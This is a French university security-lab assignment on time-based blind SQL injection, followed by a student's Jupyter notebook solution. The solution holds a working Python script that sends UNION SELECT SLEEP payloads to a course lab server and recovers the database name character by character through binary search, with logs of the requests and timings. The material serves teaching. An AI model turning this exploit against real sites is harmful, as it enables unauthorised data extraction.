# ipl I317B Sécurité : labos
## Projet 1 : exploitation SQL à l'aveugle

Pour ce premier projet (qui originellement était le dernier exercice de la semaine 3), vous allez procéder à des injections à l'aveugle. En effet, la page suicitant notre intérêt pour ce projet ne contient pas grand chose à part un bouton ... mais elle est injectable (promis) !

http://labosecuipl.alwaysdata.net/20/s03/ex2/


Cette fois-ci, le moteur de base de donnée présent derrière ce site n'est plus du sqlite mais du MariaDB. Votre objectif pour ce projet est de récupérer le nom de la base de donnée.

1. Premièrement, vous devrez analyser ce site pour trouver où faire votre injection. Comme l'indique le nom de ce projet, votre injection sera à l'aveugle, vous ne devez donc pas vous attendre à percevoir le moindre résultat pour celle-ci, aucune valeur présente sur le site ne dépend de la réusite de votre injection (par exemple: oui, la couleur du titre est *vraiment* aléatoire).  
   Pour vous aider dans votre démarche, voici quelques *gros* indices :
  - MariaDB dispose d'une fonction sleep ( https://mariadb.com/kb/en/sleep/ ) qui va faire "dormir" le code un certain nombre de seconde. La base de donnée mettra donc plus de temps avant de retourner un résultat.
  - SQL, comme d'autres langages, fait une évaluation paresseuse (lazy) des conditions. Celles-ci sont évaluée de gauche à droite et si la logique booleen le permet, les parties inutiles sont ignorées.  
    > L'exemple suivant est en python mais le comportement SQL est le même :
    > - `if False and 1/0:` ne créera pas d'exception malgré la présence d'une division par zéro.
    > - `if True and 1/0:` créera une exception `ZeroDivisionError`.
    >  
    > En effet, dans le premier cas, le résultat de `Faux ET ?` sera toujours faux ([logique booléen](https://fr.wikipedia.org/wiki/Alg%C3%A8bre_de_Boole_(logique)#Conjonction)), il n'est donc pas nécessaire d'évaluer la suite de l'expression et python ne "voit" donc même pas la division par zéro.
    > 
    > Dans la deuxième expression `True ET ?`, toute l'expression dépend de ce qui se trouve après le `ET` et donc la suite de l'expression doit être évaluée.

2. Une fois l'injection trouvée et fonctionnelle, vous devrez coder un programme qui recherchera le nom de la base de donnée (voir: https://mariadb.com/kb/en/database/ ).  
   Au vue du type d'attaque que vous allez mener (ralenti par les `sleep`) et le nombre d'étudiant (pauvre serveur), je vous demande de coder intelligemment :
  - Un des buts évalué de ce projet est de réduire le nombre de requêtes nécessaire pour obtenir le résultat par exemple avec une [recherche dichotomique](https://fr.wikipedia.org/wiki/Recherche_dichotomique).
  - Un temps de sleep entre 2 et 5 secondes devrait être suffisant dans la majorité des cas (à moins que vous n'ayez une connection internet particulièrement instable).
  - (...)

  Afin d'aiguiller votre recherche, nous partons du postula que le nom de la base de donnée à trouver ne comprend que des charactères repris dans `[a-z0-9]` ainsi que le tiret `-` et le tiret du bas `_`. (Attention le tiret du bas à une [valeur particulière](https://www.w3schools.com/sql/sql_wildcards.asp) dans le `LIKE` sql.)
3. En plus du code du point précédent, vous rédigerez quelques lignes de texte pour décrire :
  - la localisation de la vulnérabilité et la requête SQL supposée derrière (La question classique "Qu'est-ce qui tourne derrière ?").
  - le format de votre injection.
  - d'éventuelles difficultées rencontrer pendant ce projet.
  
  Ce texte peut être présenté dans une cellule de type Markdown de votre jupyter notebook.

Le format de remise préféré est un jupyter notebook mais vous pouvez également fournir un fichier "*.py*" plus un *pdf* pour la partie textuelle.

La date de remise sur moodle est le dimanche 25 octobre à 23H59.

...

In [37]:
import requests
import time

In [58]:
"""
Fait une requete post pour voir si le caractère est {=, > ,<} au caractère dans la base de donnée à la position donnée
"""
def requestPost(caractere, position, comparateur):
    timeBeforeRequest = time.time()
    sqli = " '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), %s, 1) %s '%s' ;--" %(
        position, comparateur, caractere)
    print(sqli)
    page = requests.post(
        "http://labosecuipl.alwaysdata.net/20/s03/ex2/",
        data={
            "id": sqli}
    )
    timeAfterRequest = time.time()
    print(timeAfterRequest - timeBeforeRequest)
    if (timeAfterRequest - timeBeforeRequest > 3):
        return True
    else:
        return False
    
#requestPost('l', str(1), '=')

In [59]:
"""
Renvoie la position; 'a' représente le début de la liste et 'b' la fin de la liste, 'm' le milieu
"""
def recherche_dichotomique(liste_de_donnee, position, a, b):
    if b >= a:
        m = (a+b)//2
        print(m)
        print("traitement de : " + liste_de_donnee[m])
        if (requestPost(liste_de_donnee[m], position, '=')):
            return m
        elif (requestPost(liste_de_donnee[m], position, '<')): # le char est plus grand
            return recherche_dichotomique(liste_de_donnee, position, a, m-1)
        elif (requestPost(liste_de_donnee[m], position, '>')):
            return recherche_dichotomique(liste_de_donnee, position, m+1, b)
    else:
        return -1
    

In [62]:
# du plus petit char au plus grand
dictionnaire = ['-', '_', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f',
                'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'x', 'w',
                'y', 'z']
resultat = ""
position = 1

debut = time.time()
while 1:
    res = recherche_dichotomique(dictionnaire, str(position), 0, len(dictionnaire)-1)
    if (res != -1):
        print(res)
        resultat += dictionnaire[res]
        position += 1
        print(resultat)
    else:
        break

fin = time.time()
print(resultat)
print("temps mis: ")
print(fin - debut)


18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'g' ;--
0.06877875328063965
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 'g' ;--
0.07315444946289062
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) > 'g' ;--
3.08013653755188
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'q' ;--
0.06134843826293945
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 'q' ;--
3.17667818069458
23
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'l' ;--
3.1867830753326416
23
l
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = 'g' ;--
0.07984638214111328
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < 'g' ;--
3.0720174312591553
8
traitement de : 6
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = '6' ;--
0.06949400901794434
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < '6' ;--
0.06029701232910156

3.078505516052246
32
traitement de : u
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'u' ;--
3.0724027156829834
32
labosecu
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'g' ;--
0.06731367111206055
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) < 'g' ;--
0.14761972427368164
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) > 'g' ;--
3.0915257930755615
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'q' ;--
0.1035158634185791
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) < 'q' ;--
3.075812816619873
23
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'l' ;--
0.07402467727661133
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) < 'l' ;--
3.0670225620269775
20
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'i' ;--
3.0644309520721436
20
labosecui
18
traitement de : g
 '' UNION SELECT SLEEP(3) WH

Lors de l'injection plusieurs cas peuvent se produire : 
    - le 'code' dort pendant x secondes où x est determiner dans sleep(x). Dans le cas où la condition where est respecté. 
    - le 'code' ne dort pas alors le resultat de la requete est directement envoyer. La condition where n'a pas été respecté. 

Pour voir si le code a dormi ou pas ne manière automatique, il faut utiliser Time. Dans le cas où currentTime - oldTime est plus petit (<) que 5 alors ça veut dire que la requête n'a même pas dormi 5 secondes. Dans le cas contraire elle a dormi 5 secondes. Ce qui veut dire qu'on peut enregistrer le char 
    

Pseudo-code : 

recherche_dichotomique_récursive(liste_triée):
   len = longueur de liste_triée ;
   m = len / 2 ;
   si requestPostEqual(liste_triée[m]) :
       ajouter m au string de résultat et recommencer la recherche dicotomique en changeant la position du caractère;
   si requestPostGreater(liste_triée[m]) :
       renvoyer recherche_dichotomique_récursive(liste_triée[1:m-1]) ; // partie inférieur du tableau
   sinon :
       renvoyer recherche_dichotomique_récursive(liste_triée[m+1:len]) ; // partie supérieur du tableau